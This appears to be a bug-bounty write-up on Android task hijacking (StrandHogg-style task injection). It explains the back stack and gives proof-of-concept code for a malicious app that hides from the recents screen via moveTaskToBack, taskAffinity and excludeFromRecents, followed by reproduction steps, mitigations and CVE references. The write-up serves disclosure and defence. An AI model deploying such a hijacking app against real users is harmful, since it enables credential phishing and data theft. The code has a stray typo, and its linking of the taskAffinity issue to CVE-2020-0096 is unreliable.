Understanding Task Injection Vulnerabilities: A Bug Bounty Perspective

Task Hijacking was first introduced by USENIX in 2015. It is also known as Strandhogg by many researchers.

I have submitted this vulnerability to multiple bugbounty programmes and it is marked as High-Low and informational. It is a vulnerability that is currently "not accepted" due to android updates. According to statistics in the Android market, the use of android 9 version by users has fallen below 6%. (statcounter) but I think it can still be used in pentest reports(Cure53 Pentest Report)


Usenix PoC Video

How It Works:

When the user taps an app's icon, the task for that app comes to the foreground. If there is no task for the app, a new task is created and the app's main activity is opened as the root activity of the stack. When an activity starts another activity, the new activity is added to the top of the stack and focused. The previous activity remains in the stack, but is stopped.

When the user performs a back operation, the current activity is removed from the top of the stack and destroyed. The previous activity continues and the previous state of the user interface is restored. Activities in the stack are never reorganised, they are only added to or removed from the stack as they are started and closed by the user with the Back button or gesture.

As the user taps or gestures Back, the stack removes the top activity and displays the previous activity, until the user returns to the Home screen or the activity that was running when the task started. When all activities are removed from the stack, the task no longer exists. ref : Tasks and the back stack - Android Developer


Tasks and the Back Stack

Task Hijacking is a vulnerability that affects applications running on Android devices with Task Control features due to misconfiguration in the AndroidManifest.xml file. This allows attackers/malware to hijack legitimate applications and steal user's data and perform a series of attacks such as

  • Listen through the microphone
  • Take photos with the camera
  • Read and send SMS messages
  • Make or record phone conversations
  • Phish for login credentials
  • Access private photos and files
  • Obtain location and GPS information
  • Access the contacts list and phone logs

also other important points

  • This could lead to local escalation of privilege with no additional execution privileges needed.
  • It doesn’t need the target device to be rooted.
  • It doesn’t require any specific permissions.
  • Malicious app minimizes the activity and hides itself from the popup in the overview screen.

Code Example: Here's a snippet of the MainActivity.java source code demonstrating how the malicious app operates: 


package com.example.taskinjection;

import android.os.Bundle;f

import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.taskinjection);
        moveTaskToBack(true);
    }

    @Override
    public void onResume(){
        super.onResume();
        setContentView(R.layout.taskinjection);
    }
}

And the corresponding AndroidManifest.xml file: 

<?xml version="1.0" encoding="utf-8"?>
  <manifest xmlns:android="http://schemas.android.com/apk/res/android"
      package="com.example.taskinjection"
      android:versionCode="1"
      android:versionName="1.0" >

<application
      android:allowBackup="true"
      android:icon="@mipmap/ic_launcher"
      android:label="@string/app_name"
      android:roundIcon="@mipmap/ic_launcher_round"
      android:supportsRtl="true"
      android:theme="@style/Theme.Taskinjection"
      android:taskAffinity="com.x.x">
      <activity android:name=".MainActivity" android:launchMode="singleTask" android:excludeFromRecents="true">
          <intent-filter>
              <action android:name="android.intent.action.MAIN" />

            <category android:name="android.intent.category.LAUNCHER" />
          </intent-filter>
      </activity>
  </application>

</manifest>

In this vulnerability, there are two types of hijacking state transitions.

1- Replace any application with malware.
2- Pressed the Back button, application activity dropped, it puts malware activity in the foreground.

Steps :
- Execute X Android Appand clear all on your overview screen.
- Execute malicious app. The "moveTaskToBack" function minimizes the activity and "excludeFromRecents" attribute will hide an application from pop up in the overview screen.
- and although we execute the X Android App, the activity of the malicious application occurred.

Mitigation:

- It can be add android:taskAffinity="" to the tag in the AndroidManifest.xml
- If application execute on an older Android OS version/Security patch level, a security notice may occur and/or the application will not execute.

Examples of bugbounty programs;

Some applications may not execute on rooted devices. If the user wants, they can proceed it.

A similar structure can be used. I execute my taskinjection application and then execute the application. It detected malicious action.

End-user can download your application for only the latest of Android OS version/Security patch level from Google Play. I think it's possible with uses-sdk element. https://developer.android.com/guide/topics/manifest/uses-sdk-element.html

CVE and CVSS Rating:

This vulnerability is akin to Strandhogg 1.0 and is defined as Strandhogg 2.0 (CVE-2020-0096) in the Android source, with a severity marked as "Critical." The CVSS base score is 7.8, with an impact subscore of 5.9.

References:

CVE-2020-0096 CVSS v3.1 Calculator
Android Security Bulletin - May 2020
Vulmon - CVE-2020-0096 Vulnerability Details
CVE-2020-0096 - MITRE CVE
Android task hijacking using moveTaskToBack() and excludeFromRecents